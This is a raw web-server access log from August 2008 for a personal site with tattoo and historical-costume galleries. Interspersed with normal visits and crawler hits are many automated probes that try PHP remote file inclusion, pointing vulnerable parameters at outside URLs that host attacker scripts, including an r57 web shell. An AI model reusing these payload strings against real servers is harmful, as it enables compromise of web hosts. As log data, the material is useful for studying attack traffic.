207.200.116.8 - - [22/Aug/2008:00:37:13 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.10 - - [22/Aug/2008:00:37:13 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.10 - - [22/Aug/2008:00:37:13 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.9 - - [22/Aug/2008:00:37:13 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.69 - - [22/Aug/2008:00:37:30 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.204 - - [22/Aug/2008:00:37:30 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.202 - - [22/Aug/2008:00:37:30 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
207.200.116.6 - - [22/Aug/2008:00:37:30 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
208.111.154.15 - - [22/Aug/2008:00:37:59 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [22/Aug/2008:00:37:59 -0500] "GET /?S=A HTTP/1.1" 200 1243 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
89.108.67.192 - - [22/Aug/2008:00:38:14 -0500] "GET /logs/access_log.1214179200///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:00:38:14 -0500] "GET ///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:00:38:16 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 96222 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:00:38:43 -0500] "GET /logs/access_log.1214179200///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:00:38:43 -0500] "GET ///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:00:38:44 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 96222 "-""libwww-perl/5.812"
87.106.212.108 - - [22/Aug/2008:00:40:21 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
87.106.212.108 - - [22/Aug/2008:00:40:21 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.212.108 - - [22/Aug/2008:00:40:22 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
87.106.212.108 - - [22/Aug/2008:00:40:23 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.48.98.6 - - [22/Aug/2008:00:40:26 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:00:40:27 -0500] "GET /lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:00:40:29 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:00:40:30 -0500] "GET /lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:00:40:36 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:00:40:36 -0500] "GET /lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
209.51.155.138 - - [22/Aug/2008:00:44:50 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.813"
209.51.155.138 - - [22/Aug/2008:00:44:50 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.813"
209.51.155.138 - - [22/Aug/2008:00:44:50 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
209.51.155.138 - - [22/Aug/2008:00:44:50 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
87.230.21.231 - - [22/Aug/2008:00:46:23 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:00:46:23 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.202.49.162 - - [22/Aug/2008:00:47:06 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
74.202.49.162 - - [22/Aug/2008:00:47:06 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
70.84.179.226 - - [22/Aug/2008:00:48:01 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
70.84.179.226 - - [22/Aug/2008:00:48:01 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.1.16.230 - - [22/Aug/2008:00:48:58 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:00:48:58 -0500] "GET /errors.php?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.202.2.15 - - [22/Aug/2008:00:49:28 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.1.16.230 - - [22/Aug/2008:00:49:58 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:00:49:58 -0500] "GET /errors.php?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
81.9.63.18 - - [22/Aug/2008:00:52:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:00:52:07 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
74.52.66.242 - - [22/Aug/2008:00:54:12 -0500] "GET /logs//main.php?sayfa=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:00:54:12 -0500] "GET //main.php?sayfa=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
204.11.238.210 - - [22/Aug/2008:00:57:40 -0500] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
204.11.238.210 - - [22/Aug/2008:00:57:45 -0500] "GET /layout/default/params.php?gConf[dir][layouts]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
204.11.238.210 - - [22/Aug/2008:00:59:26 -0500] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
204.11.238.210 - - [22/Aug/2008:00:59:26 -0500] "GET /layout/default/params.php?gConf[dir][layouts]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
81.9.63.18 - - [22/Aug/2008:00:59:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sexywomenonly.com/home/groups/orca/log/plr.xcm??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:00:59:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sexywomenonly.com/home/groups/orca/log/plr.xcm??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
88.208.238.90 - - [22/Aug/2008:01:03:20 -0500] "GET /logs/secure.php?&cfgProgDir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.208.238.90 - - [22/Aug/2008:01:03:21 -0500] "GET /secure.php?&cfgProgDir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
76.176.98.134 - - [22/Aug/2008:01:05:29 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:30 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:30 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:30 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:37 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:40 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:41 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:42 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:42 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:42 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:42 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:42 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:58 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 2921 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costume49%20copy.JPG HTTP/1.1" 200 16898 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costume51%20copy.JPG HTTP/1.1" 200 16648 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costm50.jpg HTTP/1.1" 200 53503 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costume52%20copy.JPG HTTP/1.1" 200 16497 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costume53%20copy.JPG HTTP/1.1" 200 16962 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costume54%20copy.JPG HTTP/1.1" 200 16716 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:05:59 -0500] "GET /costume/costume55%20copy.JPG HTTP/1.1" 200 16737 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:06:00 -0500] "GET /costume/costume56%20copy.JPG HTTP/1.1" 200 16276 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:06:00 -0500] "GET /costume/costume57%20copy.JPG HTTP/1.1" 200 16878 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:06:00 -0500] "GET /costume/costume58%20copy.JPG HTTP/1.1" 200 16381 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:06:00 -0500] "GET /costume/costume59%20copy.JPG HTTP/1.1" 200 15800 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.176.98.134 - - [22/Aug/2008:01:06:00 -0500] "GET /costume/costume60.JPG HTTP/1.1" 200 56431 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
80.93.212.218 - - [22/Aug/2008:01:09:23 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
80.93.212.218 - - [22/Aug/2008:01:09:23 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
74.6.8.121 - - [22/Aug/2008:01:17:00 -0500] "GET /logs/access_log.1174089600 HTTP/1.0" 200 148665 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
92.48.98.6 - - [22/Aug/2008:01:18:46 -0500] "GET /logs/access_log.1214179200/lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:01:18:46 -0500] "GET /lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
92.48.98.6 - - [22/Aug/2008:01:18:46 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
89.108.67.192 - - [22/Aug/2008:01:19:27 -0500] "GET /logs/access_log.1214179200///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:19:27 -0500] "GET /logs/access_log.1214179200///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:19:27 -0500] "GET ///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:19:27 -0500] "GET ///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:19:29 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 96222 "-""libwww-perl/5.812"
89.108.67.192 - - [22/Aug/2008:01:19:29 -0500] "GET /logs///?custompluginfile%5B%5D=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 96222 "-""libwww-perl/5.812"
74.6.8.121 - - [22/Aug/2008:01:22:48 -0500] "GET /logs/access_log.1172966400 HTTP/1.0" 200 237866 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.70.164.156 - - [22/Aug/2008:01:34:32 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
207.70.164.156 - - [22/Aug/2008:01:34:32 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
207.70.164.156 - - [22/Aug/2008:01:34:32 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
207.70.164.156 - - [22/Aug/2008:01:34:32 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:01:35:57 -0500] "GET /logs/access_log.1206230400/?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:01:35:58 -0500] "GET /?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:01:35:59 -0500] "GET /logs/?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 200 96216 "-""libwww-perl/5.65"
65.55.208.138 - - [22/Aug/2008:01:35:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [22/Aug/2008:01:35:59 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.202.2.15 - - [22/Aug/2008:01:37:16 -0500] "GET /logs/access_log.1206230400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
211.202.2.15 - - [22/Aug/2008:01:37:16 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
211.202.2.15 - - [22/Aug/2008:01:37:17 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
72.1.16.230 - - [22/Aug/2008:01:38:17 -0500] "GET /logs/access_log.1208044800/?error=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
74.6.8.121 - - [22/Aug/2008:01:40:16 -0500] "GET /logs/access_log.1182384000 HTTP/1.0" 200 143256 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.70.164.156 - - [22/Aug/2008:01:42:20 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
202.70.83.4 - - [22/Aug/2008:01:45:11 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
202.70.83.4 - - [22/Aug/2008:01:45:12 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
88.23.215.15 - - [22/Aug/2008:01:47:39 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.webring.com/hub?ring=history""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:40 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:41 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:41 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:44 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
88.23.215.15 - - [22/Aug/2008:01:47:49 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN Optimized;ES; MSN Optimized;ES)"
